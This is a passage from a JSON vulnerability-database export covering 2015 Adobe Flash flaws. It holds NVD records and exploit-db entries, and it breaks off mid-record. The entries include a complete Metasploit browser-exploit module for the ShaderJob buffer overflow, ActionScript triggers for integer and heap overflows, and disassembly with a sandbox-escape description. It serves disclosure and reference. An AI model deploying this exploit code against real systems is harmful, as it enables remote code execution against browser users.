"AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.475:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\&_compiler:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 allow remote attackers to bypass intended restrictions on filesystem write operations via unspecified vectors, a different vulnerability than CVE-2015-3082 and CVE-2015-3085.", "edition": 5, "cvss3": {}, "published": "2015-05-13T11:00:00", "title": "CVE-2015-3083", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3083"], "modified": "2017-09-17T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:air_sdk_\\&_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3083", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3083", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.475:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\&_compiler:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.289 and 14.x through 17.x before 17.0.0.188 on Windows and OS X and before 11.2.202.460 on Linux, Adobe AIR before 17.0.0.172, Adobe AIR SDK before 17.0.0.172, and Adobe AIR SDK & Compiler before 17.0.0.172 do not properly restrict discovery of memory addresses, which allows attackers to bypass the ASLR protection mechanism via unspecified vectors, a different vulnerability than CVE-2015-3091.", "edition": 5, "cvss3": {}, "published": "2015-05-13T11:00:00", "title": "CVE-2015-3092", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3092"], "modified": "2017-01-03T03:00:00", "cpe": ["cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:11.2.202.475", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:air_sdk_\\&_compiler:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:air_sdk:17.0.0.144", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:air:17.0.0.144", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3092", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3092", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.475:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\&_compiler:17.0.0.144:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-04T06:41:45", "description": "Flash Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory. CVE-2015-3093. Dos exploit for windows platform", "published": "2015-08-19T00:00:00", "type": "exploitdb", "title": "Flash Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3093"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37846", "href": "https://www.exploit-db.com/exploits/37846/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=326&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=475018]\r\n\r\nCredit is to bilou, working with the Chromium Vulnerability Rewards Program.\r\n\r\n---\r\nVULNERABILITY DETAILS\r\nIssues in DefineBitsLossless and DefineBitsLossless2 leads to using uninitialized memory while rendering a picture. This is caused by the returned value of a zlib function not properly checked.\r\n\r\nVERSION\r\nChrome version 41.0.2272.101, Flash 17.0.0.134 (the code below comes from flash player standalone exe 17.0.0.134)\r\nOperating System: Win 7 x64 SP1\r\n\r\nREPRODUCTION CASE\r\n\r\nCompile the provided poc with flex sdk:\r\nmxmlc -static-link-runtime-shared-libraries=true -compress=false -target-player 15.0 -swf-version 25 XBitmapGif.as\r\n\r\nAnd change the bytes in the DefineBitsLossless2 tag, at offset 0x228:\r\n 14 00 14 00 78 to 14 00 14 00 41\r\n\r\nTo get a DefineBitsLossless tag, change the byte at offset 0x220:\r\n 09 47 00 00 00 to 05 47 00 00 00\r\n \r\nLoad the provided pocs and see the pointers partially disclosed.\r\n \r\nWhen handling such tags, Flash first allocates a buffer according to the picture's width and height but does not initialize it. If the compressed data stream is corrupted, the zlib function just returns an invalid token and Flash leaves the uninitialized buffer as is.\r\n\r\nLook at sub_54732C:\r\n\r\n.text:0054746C loc_54746C:\r\n.text:0054746C mov ecx, [esi]\r\n.text:0054746E push 0 \r\n.text:00547470 push 0 \r\n.text:00547472 push eax \r\n.text:00547473 push [ebp+var_10]\r\n.text:00547476 push [ebp+var_14]\r\n.text:00547479 push [ebp+var_C]\r\n.text:0054747C call sub_545459 ; allocate a buffer of 4 * 14h * 14h = 640h\r\n.text:00547481 cmp [ebp+var_1], 0\r\n.text:00547485 mov ecx, [esi]\r\n.text:00547487 setnz al\r\n.text:0054748A mov [ecx+58h], al\r\n...\r\n.text:005474DE loc_5474DE:\r\n.text:005474DE lea eax, [ebp+var_50]\r\n.text:005474E1 push 0\r\n.text:005474E3 push eax\r\n.text:005474E4 call xinflate ; inflate the buffer, but there's no error check?\r\n.text:005474E9 pop ecx ; thus we can return 0xFFFFFFFD in eax with a corrupt stream\r\n.text:005474EA pop ecx\r\n.text:005474EB cmp eax, 1\r\n.text:005474EE jz short loc_5474FB\r\n.text:005474F0 test eax, eax\r\n.text:005474F2 jnz short loc_54753A ; which will skip the buffer initialization\r\n\r\n\r\nReading this data back is not straightforward. For a DefineBitsLossless tag, we can read values like 0xFFXXYYZZ. For a DefineBitsLossless2 tag an operation is performed on the pixels so we can only read f(pixel). That function is handled by sub_4CD3B0 and uses a hardcoded table. By conbining both the DefineBitsLossless and DefineBitsLossless2 tags I'm quite convinced we can guess a full pointer.\r\n---\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37846.zip\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37846/"}, {"lastseen": "2016-02-04T06:41:20", "description": "Flash Player Integer Overflow in Function.apply. CVE-2015-3087. Dos exploit for windows platform", "published": "2015-08-19T00:00:00", "type": "exploitdb", "title": "Flash Player Integer Overflow in Function.apply", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3087"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37843", "href": "https://www.exploit-db.com/exploits/37843/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=302&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470837]\r\n\r\nVULNERABILITY DETAILS\r\nAn integer overflow while calling Function.apply can lead to enter an ActionScript function without correctly validating the supplied arguments.\r\n\r\nVERSION\r\nChrome Version: 41.0.2272.101 stable, Flash 17.0.0.134\r\nOperating System: Win7 x64 SP1\r\n\r\nREPRODUCTION CASE\r\n\r\nFrom exec.cpp taken from the Crossbridge sources, available at https://github.com/adobe-flash/crossbridge/blob/master/avmplus/core/exec.cpp\r\n\r\n944 // Specialized to be called from Function.apply(). \r\n945 Atom BaseExecMgr::apply(MethodEnv* env, Atom thisArg, ArrayObject *a) \r\n946 { \r\n947 int32_t argc = a->getLength(); \r\n\r\n...\r\n \r\n966 // Tail call inhibited by local allocation/deallocation. \r\n967 MMgc::GC::AllocaAutoPtr _atomv; \r\n968 Atom* atomv = (Atom*)avmStackAllocArray(core, _atomv, (argc+1), sizeof(Atom)); //here if argc = 0xFFFFFFFF we get an integer overflow\r\n969 atomv[0] = thisArg; \r\n970 for (int32_t i=0 ; i < argc ; i++ ) \r\n971 atomv[i+1] = a->getUintProperty(i); \r\n972 return env->coerceEnter(argc, atomv); \r\n973 } \r\n\r\n\r\nSo the idea is to use the rest argument to get a working poc. For example:\r\n\r\n public function myFunc(a0:ByteArray, a1:ByteArray, a2:ByteArray, a3:ByteArray, a4:ByteArray, a5:ByteArray, ... rest) {\r\n \r\n try {a0.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a1.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a2.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a3.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a4.writeUnsignedInt(0x41414141)}catch (e) {}\r\n \r\n }\r\n public function XApplyPoc() {\r\n var a:Array = new Array()\r\n \r\n a.length = 0xFFFFFFFF\r\n myFunc.apply(this, a)\r\n }\r\n\r\nCompile with mxmlc -target-player 15.0 -swf-version 25 XApplyPoc.as.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37843.zip\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37843/"}, {"lastseen": "2016-02-04T05:40:57", "description": "Adobe Flash Player ShaderJob Buffer Overflow. CVE-2015-3090. Remote exploits for multiple platform", "published": "2015-06-24T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player ShaderJob Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3090"], "modified": "2015-06-24T00:00:00", "id": "EDB-ID:37368", "href": "https://www.exploit-db.com/exploits/37368/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a buffer overflow vulnerability related to the ShaderJob workings on\r\n Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the\r\n same Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute\r\n of the ShaderJob after starting the job it's possible to create a buffer overflow condition\r\n where the size of the destination buffer and the length of the copy are controlled. This\r\n module has been tested successfully on:\r\n * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.\r\n * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.\r\n * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.\r\n * Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Chris Evans', # Vulnerability discovery\r\n 'Unknown', # Exploit in the wild\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-3090'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],\r\n ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n return true if ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'May 12 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n\r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37368/"}, {"lastseen": "2016-02-04T06:41:29", "description": "Flash AVSS.setSubscribedTags Use After Free Memory Corruption. CVE-2015-3088. Dos exploit for windows platform", "published": "2015-08-19T00:00:00", "type": "exploitdb", "title": "Flash AVSS.setSubscribedTags Use After Free Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3088"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37844", "href": "https://www.exploit-db.com/exploits/37844/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=303&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470864]\r\n\r\nVULNERABILITY DETAILS\r\nUse After Free in Flash AVSS.setSubscribedTags, setCuePointTags and setSubscribedTagsForBackgroundManifest can be abused to write pointers to String to freed locations.\r\n\r\nVERSION\r\nChrome Version: 41.0.2272.101 stable, Flash 17.0.0.134\r\nOperating System: Win7 x64 SP1\r\n\r\nREPRODUCTION CASE\r\nUse After Free vulnerability in AVSS.setSubscribedTags can cause arbitrary code execution.\r\npepflashplayer.dll 17.0.0.134, based at 0x10000000.\r\n\r\nThe setSubscribedTags is handled by sub_103255AD:\r\n\r\n.text:103255AD push ebp\r\n.text:103255AE mov ebp, esp\r\n.text:103255B0 and esp, 0FFFFFFF8h\r\n.text:103255B3 sub esp, 14h\r\n.text:103255B6 push ebx\r\n.text:103255B7 mov ebx, [ebp+arg_0]\r\n.text:103255BA push esi\r\n.text:103255BB push edi\r\n.text:103255BC mov edi, eax\r\n.text:103255BE mov eax, [ebx]\r\n.text:103255C0 mov ecx, ebx\r\n.text:103255C2 call dword ptr [eax+8Ch] ; first get the length of the provided array\r\n.text:103255C8 lea esi, [edi+4Ch]\r\n.text:103255CB mov [esp+20h+var_C], eax\r\n.text:103255CF call sub_103265BB\r\n.text:103255D4 mov esi, [esp+20h+var_C]\r\n.text:103255D8 test esi, esi\r\n.text:103255DA jz loc_1032566D\r\n.text:103255E0 xor ecx, ecx\r\n.text:103255E2 push 4\r\n.text:103255E4 pop edx\r\n.text:103255E5 mov eax, esi\r\n.text:103255E7 mul edx\r\n.text:103255E9 seto cl\r\n.text:103255EC mov [edi+58h], esi\r\n.text:103255EF neg ecx\r\n.text:103255F1 or ecx, eax\r\n.text:103255F3 push ecx\r\n.text:103255F4 call unknown_libname_129 ; and then allocate an array of 4*length\r\n.text:103255F9 and [esp+24h+var_10], 0\r\n.text:103255FE pop ecx\r\n.text:103255FF mov [edi+54h], eax ; that pointer is put at offset 0x54 in the object pointed by edi\r\n\r\n\r\nNext there is a for loop that iterates over the array items and calls the toString() method of each item encountered:\r\n\r\n.text:10325606 loc_10325606:\r\n.text:10325606 mov eax, [edi+8]\r\n.text:10325609 mov eax, [eax+14h]\r\n.text:1032560C mov esi, [eax+4]\r\n.text:1032560F push [esp+20h+var_10]\r\n.text:10325613 mov eax, [ebx]\r\n.text:10325615 mov ecx, ebx\r\n.text:10325617 call dword ptr [eax+3Ch] ; get the ith element\r\n.text:1032561A push eax\r\n.text:1032561B mov ecx, esi\r\n.text:1032561D call sub_1007205D ; call element->toString()\r\n.text:10325622 lea ecx, [esp+20h+var_8]\r\n.text:10325626 push ecx\r\n.text:10325627 call sub_10061703\r\n.text:1032562C mov eax, [esp+20h+var_4]\r\n.text:10325630 inc eax\r\n.text:10325631 push eax\r\n.text:10325632 call unknown_libname_129\r\n.text:10325637 mov edx, [edi+54h]\r\n.text:1032563A pop ecx\r\n.text:1032563B mov ecx, [esp+20h+var_10]\r\n.text:1032563F mov [edx+ecx*4], eax ; write a pointer to the string in the array\r\n...\r\n.text:1032565F inc [esp+20h+var_10]\r\n.text:10325663 mov eax, [esp+20h+var_10]\r\n.text:10325667 cmp eax, [esp+20h+var_C]\r\n.text:1032566B jl short loc_10325606\r\n\r\n\r\nThe issue can be triggered as follows. Register an object with a custom toString method in an array and call AVSS.setSubscribedTags(array). When object.toString() is called, call again AVSS.setSubscribedTags with a smaller array. This results in freeing the first buffer. So when the execution flow returns to AVSS.setSubscribedTags a UAF occurs allowing an attacker to write a pointer to a string somewhere in memory.\r\n\r\nTrigger with that:\r\n\r\n var avss:flash.media.AVSegmentedSource = new flash.media.AVSegmentedSource ();\r\n \r\n var o:Object = new Object();\r\n o.toString = function():String {\r\n var a = [0,1,2,3];\r\n avss.setSubscribedTags(a);\r\n return \"ahahahahah\"\r\n };\r\n \r\n var a = [o,1,2,3,4,5,6,7,8,9];\r\n var i:uint = 0;\r\n while (i < 0x100000) {\r\n i++;\r\n a.push(i);\r\n }\r\n avss.setSubscribedTags(a);\r\n\r\nNote: AVSS.setCuePointTags and AVSS.setSubscribedTagsForBackgroundManifest are vulnerable as well, see XAVSSArrayPoc2.swf and XAVSSArrayPoc3.swf.\r\n \r\nCompile with mxmlc -target-player 15.0 -swf-version 25 XAVSSArrayPoc.as.\r\n\r\nMy mistake, not a UAF but instead a heap overflow. We allocate first 4*0x100000 bytes, then free that buffer, then reallocate 4*4 bytes, then write 0x100000 pointers to a buffer of size 0x10.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37844.zip\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37844/"}, {"lastseen": "2016-02-04T06:40:58", "description": "Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash. CVE-2015-3082. Remote exploit for windows platform", "published": "2015-08-19T00:00:00", "type": "exploitdb", "title": "Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3082"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37840", "href": "https://www.exploit-db.com/exploits/37840/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=278&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\nFlashBroker - Junction Check Bypass With Forward Slash IE PM Sandbox Escape\r\n\r\n1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker\r\n\r\nFlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.\r\n\r\nThere is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker only considers \"\\\" as delimiter. If the destination includes \"/\", FlashBroker will use a wrong destination folder for check.\r\n\r\nThe PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.\r\n\r\n2. Credit\r\nJietao Yang of KeenTeam (@K33nTeam) is credited for the vulnerability.\r\n\r\nProof of 